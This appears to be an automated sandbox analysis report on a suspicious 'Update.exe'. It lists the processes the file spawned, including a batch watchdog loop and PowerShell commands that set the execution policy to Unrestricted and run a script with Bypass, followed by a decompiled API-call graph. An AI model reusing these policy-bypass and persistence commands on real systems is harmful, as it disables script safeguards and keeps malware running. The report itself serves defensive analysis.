                                            Target ID:2
                                            Start time:21:43:14
                                            Start date:29/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:21:43:14
                                            Start date:29/12/2024
                                            Path:C:\Users\Public\Bilite\Axialis\Update.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\Bilite\Axialis\Update.exe
                                            Imagebase:0x220000
                                            File size:395'368 bytes
                                            MD5 hash:FB325C945A08D06FE91681179BDCCC66
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            Target ID:8
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:9
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:10
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                            Imagebase:0x620000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "Update.exe"
                                            Imagebase:0x5f0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout /t 30 /nobreak
                                            Imagebase:0xf90000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:21:44:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:21:44:25
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:15
                                            Start time:21:44:25
                                            Start date:29/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:16
                                            Start time:21:44:25
                                            Start date:29/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:17
                                            Start time:21:44:25
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                            Imagebase:0xdf0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:18
                                            Start time:21:44:25
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                            Imagebase:0xdf0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:21:44:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                            Imagebase:0x620000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:21:44:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "Update.exe"
                                            Imagebase:0x5f0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:22
                                            Start time:21:44:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout /t 30 /nobreak
                                            Imagebase:0xf90000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:21:45:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                            Imagebase:0x620000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:24
                                            Start time:21:45:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "Update.exe"
                                            Imagebase:0x5f0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:25
                                            Start time:21:45:24
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout /t 30 /nobreak
                                            Imagebase:0xf90000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:21:45:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                            Imagebase:0x620000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:21:45:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "Update.exe"
                                            Imagebase:0x5f0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:21:45:54
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout /t 30 /nobreak
                                            Imagebase:0xf90000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:18%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:26.8%
                                              Total number of Nodes:1423
                                              Total number of Limit Nodes:15
                                              execution_graph 9093 410e7f 9094 410e9a 9093->9094 9095 410eb5 9094->9095 9097 40f42d 9094->9097 9098 40f445 free 9097->9098 9099 40f437 9097->9099 9100 4024e7 46 API calls 9098->9100 9099->9098 9101 40f456 9099->9101 9100->9101 9101->9095 9089 40e63c 9090 40e5d3 6 API calls 9089->9090 9091 40e644 9090->9091 8241 4024c4 8242 40245a 45 API calls 8241->8242 8243 4024cd 8242->8243 8244 4024d2 8243->8244 8245 4024d3 VirtualAlloc 8243->8245 8246 4096c7 _EH_prolog 8260 4096fa 8246->8260 8247 40971c 8248 409827 8281 40118a 8248->8281 8250 409851 8255 40985e ??2@YAPAXI 8250->8255 8251 40983c 8332 409425 8251->8332 8252 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8252->8260 8254 40969d 8 API calls 8254->8260 8256 409878 8255->8256 8261 409925 ??2@YAPAXI 8256->8261 8262 4098c2 8256->8262 8266 409530 3 API calls 8256->8266 8268 409425 ctype 3 API calls 8256->8268 8270 4099a2 8256->8270 8275 409a65 8256->8275 8291 409fb4 8256->8291 8295 408ea4 8256->8295 8338 409c13 ??2@YAPAXI 8256->8338 8340 409f49 8256->8340 8258 40e959 VirtualFree ??3@YAXPAX free free ctype 8258->8260 8260->8247 8260->8248 8260->8252 8260->8254 8260->8258 8325 4095b7 8260->8325 8329 409403 8260->8329 8261->8256 8335 409530 8262->8335 8266->8256 8268->8256 8271 409530 3 API calls 8270->8271 8272 4099c7 8271->8272 8273 409425 ctype 3 API calls 8272->8273 8273->8247 8277 409530 3 API calls 8275->8277 8278 409a84 8277->8278 8279 409425 ctype 3 API calls 8278->8279 8279->8247 8282 401198 GetDiskFreeSpaceExW 8281->8282 8283 4011ee SendMessageW 8281->8283 8282->8283 8284 4011b0 8282->8284 8289 4011d6 8283->8289 8284->8283 8285 401f9d 19 API calls 8284->8285 8286 4011c9 8285->8286 8287 407717 25 API calls 8286->8287 8288 4011cf 8287->8288 8288->8289 8290 4011e7 8288->8290 8289->8250 8289->8251 8290->8283 8292 409fdd 8291->8292 8344 409dff 8292->8344 8618 40aef3 8295->8618 8298 408ec1 8298->8256 8300 408fd5 8636 408b7c 8300->8636 8301 408f0d ??2@YAPAXI 8310 408ef5 8301->8310 8303 408f31 ??2@YAPAXI 8303->8310 8310->8300 8310->8301 8310->8303 8681 40cdb8 ??2@YAPAXI 8310->8681 8326 4095c6 8325->8326 8328 4095cc 8325->8328 8326->8260 8327 4095e2 _CxxThrowException 8327->8326 8328->8326 8328->8327 8330 40e8e2 4 API calls 8329->8330 8331 40940b 8330->8331 8331->8260 8333 40e8da ctype 3 API calls 8332->8333 8334 409433 8333->8334 8336 408963 ctype 3 API calls 8335->8336 8337 40953b 8336->8337 8339 409c45 8338->8339 8339->8256 8341 409f4e 8340->8341 8342 409f75 8341->8342 8343 409cde 110 API calls 8341->8343 8342->8256 8343->8341 8346 409e04 8344->8346 8345 409e3a 8345->8256 8346->8345 8348 409cde 8346->8348 8349 409cf8 8348->8349 8353 40db1f 8349->8353 8356 401626 8349->8356 8350 409d2c 8350->8346 8419 40da56 8353->8419 8357 401642 8356->8357 8363 401638 8356->8363 8427 40a62f _EH_prolog 8357->8427 8359 40166f 8495 40eca9 8359->8495 8360 401411 2 API calls 8362 401688 8360->8362 8364 401962 ??3@YAXPAX 8362->8364 8365 40169d 8362->8365 8363->8350 8369 40eca9 VariantClear 8364->8369 8453 401329 8365->8453 8368 4016a8 8457 401454 8368->8457 8369->8363 8372 401362 2 API calls 8373 4016c7 ??3@YAXPAX 8372->8373 8378 4016d9 8373->8378 8405 401928 ??3@YAXPAX 8373->8405 8375 40eca9 VariantClear 8375->8363 8376 4016fa 8377 40eca9 VariantClear 8376->8377 8379 401702 ??3@YAXPAX 8377->8379 8378->8376 8380 401764 8378->8380 8393 401725 8378->8393 8379->8359 8382 4017a2 8380->8382 8383 401789 8380->8383 8381 40eca9 VariantClear 8384 401737 ??3@YAXPAX 8381->8384 8386 4017c4 GetLocalTime SystemTimeToFileTime 8382->8386 8387 4017aa 8382->8387 8385 40eca9 VariantClear 8383->8385 8384->8359 8388 401791 ??3@YAXPAX 8385->8388 8386->8387 8389 4017e1 8387->8389 8390 4017f8 8387->8390 8387->8393 8388->8359 8462 403354 lstrlenW 8389->8462 8486 40301a GetFileAttributesW 8390->8486 8393->8381 8395 401934 GetLastError 8395->8405 8396 401818 ??2@YAPAXI 8398 401824 8396->8398 8397 40192a 8397->8395 8499 40db53 8398->8499 8401 40190f 8404 40eca9 VariantClear 8401->8404 8402 40185f GetLastError 8502 4012f7 8402->8502 8404->8405 8405->8375 8406 401871 8407 403354 86 API calls 8406->8407 8411 40187f ??3@YAXPAX 8406->8411 8409 4018cc 8407->8409 8409->8411 8412 40db53 2 API calls 8409->8412 8410 40189c 8413 40eca9 VariantClear 8410->8413 8411->8410 8414 4018f1 8412->8414 8415 4018aa ??3@YAXPAX 8413->8415 8416 4018f5 GetLastError 8414->8416 8417 401906 ??3@YAXPAX 8414->8417 8415->8359 8416->8411 8417->8401 8424 40d985 8419->8424 8422 40da65 CreateFileW 8423 40da8a 8422->8423 8423->8350 8425 40d98f CloseHandle 8424->8425 8426 40d99a 8424->8426 8425->8426 8426->8422 8426->8423 8428 40a738 8427->8428 8429 40a66a 8427->8429 8430 40a687 8428->8430 8431 40a73d 8428->8431 8429->8430 8432 40a704 8429->8432 8433 40a679 8429->8433 8440 40a6ad 8430->8440 8531 40a3b0 8430->8531 8434 40a6f2 8431->8434 8437 40a747 8431->8437 8438 40a699 8431->8438 8432->8440 8505 40e69c 8432->8505 8433->8434 8435 40a67e 8433->8435 8527 40ed34 8434->8527 8439 40a6b2 8435->8439 8444 40a684 8435->8444 8437->8434 8437->8439 8438->8440 8519 40ed59 8438->8519 8439->8440 8523 40ed79 8439->8523 8514 40ecae 8440->8514 8443 40a71a 8508 40eced 8443->8508 8444->8430 8444->8438 8450 40eca9 VariantClear 8452 40166b 8450->8452 8452->8359 8452->8360 8454 401340 8453->8454 8455 40112b 2 API calls 8454->8455 8456 40134b 8455->8456 8456->8368 8458 4012f7 2 API calls 8457->8458 8459 401462 8458->8459 8546 4013e2 8459->8546 8461 40146d 8461->8372 8463 4024fc 2 API calls 8462->8463 8464 403375 8463->8464 8465 40112b 2 API calls 8464->8465 8468 403385 8464->8468 8465->8468 8467 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8469 4033e8 8467->8469 8470 4033f2 8467->8470 8468->8467 8476 403477 8468->8476 8549 401986 CreateDirectoryW 8468->8549 8471 40301a 22 API calls 8469->8471 8472 401986 4 API calls 8470->8472 8483 4033f8 ??3@YAXPAX 8470->8483 8471->8470 8485 403405 8472->8485 8473 4034a7 8474 407776 55 API calls 8473->8474 8479 4034b1 ??3@YAXPAX 8474->8479 8475 40340a 8555 407776 8475->8555 8476->8473 8476->8483 8477 40346b ??3@YAXPAX 8482 4034bc 8477->8482 8478 40341d memcpy 8478->8485 8479->8482 8482->8393 8483->8482 8484 401986 4 API calls 8484->8485 8485->8475 8485->8477 8485->8478 8485->8484 8487 403037 8486->8487 8493 401804 8486->8493 8488 403048 8487->8488 8489 40303b SetLastError 8487->8489 8490 403051 8488->8490 8492 40305f FindFirstFileW 8488->8492 8488->8493 8489->8493 8574 402fed 8490->8574 8492->8490 8494 403072 FindClose CompareFileTime 8492->8494 8493->8395 8493->8396 8493->8397 8494->8490 8494->8493 8496 40ec65 8495->8496 8497 40ec86 VariantClear 8496->8497 8498 40ec9d 8496->8498 8497->8363 8498->8363 8615 40db3c 8499->8615 8503 40112b 2 API calls 8502->8503 8504 401311 8503->8504 8504->8406 8506 4012f7 2 API calls 8505->8506 8507 40e6a9 8506->8507 8507->8443 8535 40ecd7 8508->8535 8511 40ed12 8512 40a726 ??3@YAXPAX 8511->8512 8513 40ed17 _CxxThrowException 8511->8513 8512->8440 8513->8512 8538 40ec65 8514->8538 8516 40ecba 8517 40a7b2 8516->8517 8518 40ecbe memcpy 8516->8518 8517->8450 8518->8517 8520 40ed62 8519->8520 8521 40ed67 8519->8521 8522 40ecd7 VariantClear 8520->8522 8521->8440 8522->8521 8524 40ed82 8523->8524 8525 40ed87 8523->8525 8526 40ecd7 VariantClear 8524->8526 8525->8440 8526->8525 8528 40ed42 8527->8528 8529 40ed3d 8527->8529 8528->8440 8530 40ecd7 VariantClear 8529->8530 8530->8528 8532 40a3c2 8531->8532 8533 40a3de 8532->8533 8542 40eda0 8532->8542 8533->8440 8536 40eca9 VariantClear 8535->8536 8537 40ecdf SysAllocString 8536->8537 8537->8511 8537->8512 8539 40ec6d 8538->8539 8540 40ec86 VariantClear 8539->8540 8541 40ec9d 8539->8541 8540->8516 8541->8516 8543 40edae 8542->8543 8544 40eda9 8542->8544 8543->8533 8545 40ecd7 VariantClear 8544->8545 8545->8543 8547 401398 2 API calls 8546->8547 8548 4013f2 8547->8548 8548->8461 8550 4019c7 8549->8550 8551 401997 GetLastError 8549->8551 8550->8468 8552 4019b1 GetFileAttributesW 8551->8552 8554 4019a6 8551->8554 8552->8550 8552->8554 8553 4019a7 SetLastError 8553->8468 8554->8550 8554->8553 8556 401f9d 19 API calls 8555->8556 8557 40778a wvsprintfW 8556->8557 8558 407859 8557->8558 8559 4077ab GetLastError FormatMessageW 8557->8559 8562 4076a8 25 API calls 8558->8562 8560 4077d9 FormatMessageW 8559->8560 8561 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8559->8561 8560->8558 8560->8561 8566 4076a8 8561->8566 8564 407865 8562->8564 8564->8483 8567 407715 ??3@YAXPAX LocalFree 8566->8567 8568 4076b7 8566->8568 8567->8564 8569 40661a 2 API calls 8568->8569 8570 4076c6 IsWindow 8569->8570 8571 4076ef 8570->8571 8572 4076dd IsBadReadPtr 8570->8572 8573 4073d1 21 API calls 8571->8573 8572->8571 8573->8567 8580 402c86 8574->8580 8576 402ff6 8577 403017 8576->8577 8578 402ffb GetLastError 8576->8578 8577->8493 8579 403006 8578->8579 8579->8493 8581 402c93 GetFileAttributesW 8580->8581 8582 402c8f 8580->8582 8583 402ca4 8581->8583 8584 402ca9 8581->8584 8582->8576 8583->8576 8585 402cc7 8584->8585 8586 402cad SetFileAttributesW 8584->8586 8591 402b79 8585->8591 8588 402cc3 8586->8588 8589 402cba DeleteFileW 8586->8589 8588->8576 8589->8576 8592 4024fc 2 API calls 8591->8592 8593 402b90 8592->8593 8594 40254d 2 API calls 8593->8594 8595 402b9d FindFirstFileW 8594->8595 8596 402c55 SetFileAttributesW 8595->8596 8609 402bbf 8595->8609 8598 402c60 RemoveDirectoryW 8596->8598 8599 402c78 ??3@YAXPAX 8596->8599 8597 401329 2 API calls 8597->8609 8598->8599 8600 402c6d ??3@YAXPAX 8598->8600 8601 402c80 8599->8601 8600->8601 8601->8576 8603 40254d 2 API calls 8603->8609 8604 402c24 SetFileAttributesW 8604->8599 8606 402c2d DeleteFileW 8604->8606 8605 402bef lstrcmpW 8607 402c05 lstrcmpW 8605->8607 8608 402c38 FindNextFileW 8605->8608 8606->8609 8607->8608 8607->8609 8608->8609 8610 402c4e FindClose 8608->8610 8609->8597 8609->8599 8609->8603 8609->8604 8609->8605 8609->8608 8611 402b79 2 API calls 8609->8611 8612 401429 8609->8612 8610->8596 8611->8609 8613 401398 2 API calls 8612->8613 8614 401433 8613->8614 8614->8609 8616 40db1f 2 API calls 8615->8616 8617 401857 8616->8617 8617->8401 8617->8402 8619 40af0c 8618->8619 8634 408ebd 8618->8634 8619->8634 8711 40ac7a 8619->8711 8621 40af3f 8622 40ac7a 7 API calls 8621->8622 8623 40b0cb 8621->8623 8627 40af96 8622->8627 8625 40e959 ctype 4 API calls 8623->8625 8624 40afbd 8718 40e959 8624->8718 8625->8634 8627->8623 8627->8624 8628 40b043 8631 40e959 ctype 4 API calls 8628->8631 8629 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8630 40afc6 8629->8630 8630->8628 8630->8629 8632 40b07f 8631->8632 8633 40e959 ctype 4 API calls 8632->8633 8633->8634 8634->8298 8635 4065ea InitializeCriticalSection 8634->8635 8635->8310 8730 4086f0 8636->8730 8682 40cdc7 8681->8682 8683 408761 4 API calls 8682->8683 8684 40cdde 8683->8684 8684->8310 8712 40e8da ctype 3 API calls 8711->8712 8713 40ac86 8712->8713 8722 40e811 8713->8722 8715 40aca2 8715->8621 8716 409403 4 API calls 8717 40ac90 8716->8717 8717->8715 8717->8716 8719 40e93b 8718->8719 8720 40e8da ctype 3 API calls 8719->8720 8721 40e943 ??3@YAXPAX 8720->8721 8721->8630 8723 40e8a5 8722->8723 8724 40e824 8722->8724 8723->8717 8725 40e833 _CxxThrowException 8724->8725 8726 40e863 ??2@YAPAXI 8724->8726 8727 40e895 ??3@YAXPAX 8724->8727 8725->8724 8726->8724 8728 40e879 memcpy 8726->8728 8727->8723 8728->8727 8731 40e8da ctype 3 API calls 8730->8731 8732 4086f8 8731->8732 8733 40e8da ctype 3 API calls 8732->8733 8734 408700 8733->8734 8735 40e8da ctype 3 API calls 8734->8735 8736 408708 8735->8736 9102 40dace 9105 40daac 9102->9105 9108 40da8f 9105->9108 9109 40da56 2 API calls 9108->9109 9110 40daa9 9109->9110 9092 40dadc ReadFile 9111 411def __set_app_type __p__fmode __p__commode 9112 411e5e 9111->9112 9113 411e72 9112->9113 9114 411e66 __setusermatherr 9112->9114 9123 411f66 _controlfp 9113->9123 9114->9113 9116 411e77 _initterm __getmainargs _initterm 9117 411ecb GetStartupInfoA 9116->9117 9119 411eff GetModuleHandleA 9117->9119 9124 4064af _EH_prolog 9119->9124 9123->9116 9127 404faa 9124->9127 9432 401b37 GetModuleHandleW CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9149 40509b _wtol 9151 4050b1 9149->9151 9150 4050d6 9152 403d71 6 API calls 9150->9152 9463 404405 9151->9463 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9620 404996 9154->9620 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9161 407776 55 API calls 9160->9161 9170 4050ec 9161->9170 9162 4050ee ??3@YAXPAX 9638 403e70 9162->9638 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9178 405173 9165->9178 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9173 4052f2 9169->9173 9170->9162 9171 4051fa 9171->9170 9172 40522a 9171->9172 9175 405213 _wtol 9171->9175 9176 403d71 6 API calls 9172->9176 9174 40538d ??2@YAPAXI 9173->9174 9177 401329 2 API calls 9173->9177 9184 405399 9174->9184 9175->9172 9182 405289 9176->9182 9179 405327 9177->9179 9178->9166 9178->9170 9178->9171 9178->9172 9181 401429 2 API calls 9178->9181 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9178 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9196 4053f6 9194->9196 9197 40536e 9195->9197 9198 4025ae 2 API calls 9196->9198 9199 40254d 2 API calls 9197->9199 9201 4053fe 9198->9201 9200 405377 9199->9200 9200->9174 9491 404e3f 9201->9491 9206 40546f 9207 405534 9206->9207 9210 403d71 6 API calls 9206->9210 9209 40e8da ctype 3 API calls 9207->9209 9208 402844 10 API calls 9211 405441 9208->9211 9212 40553c 9209->9212 9213 405493 9210->9213 9211->9206 9214 407776 55 API calls 9211->9214 9215 405573 9212->9215 9669 403093 9212->9669 9213->9207 9224 40549d 9213->9224 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9162 9218->9170 9222 405588 wsprintfW 9219->9222 9223 4055ed 9219->9223 9230 401411 2 API calls 9219->9230 9232 401329 ??2@YAPAXI ??3@YAXPAX 9219->9232 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9221->9225 9226 401411 2 API calls 9222->9226 9519 404603 9223->9519 9224->9218 9643 404cbc 9224->9643 9225->9218 9226->9219 9229 4054cc 9229->9218 9231 407776 55 API calls 9229->9231 9230->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9231->9233 9232->9219 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9581 404034 9240->9581 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9251 40243b lstrcmpW 9245->9251 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9250 405969 9249->9250 9252 405979 9250->9252 9255 401f9d 19 API calls 9250->9255 9253 4059fe 9251->9253 9736 403b40 9252->9736 9256 405a12 9253->9256 9259 401329 2 API calls 9253->9259 9254 401411 ??2@YAPAXI ??3@YAXPAX 9254->9268 9255->9252 9587 403b59 9256->9587 9258 401362 2 API calls 9258->9268 9259->9256 9263 4073d1 21 API calls 9267 40599c ctype 9263->9267 9264 401329 2 API calls 9264->9268 9265 4055f6 9265->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9265->9275 9279 4057dd _wtol 9265->9279 9294 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9265->9294 9710 40484d 9265->9710 9721 40408b 9265->9721 9266 405a4d 9272 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9266->9272 9308 405a61 9266->9308 9756 4082e9 9266->9756 9273 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9273 9268->9240 9268->9241 9268->9247 9268->9254 9268->9258 9268->9264 9271 402f6c 7 API calls 9268->9271 9578 40243b 9268->9578 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9271->9268 9272->9266 9273->9170 9275->9265 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9308 9279->9265 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301 405bf3 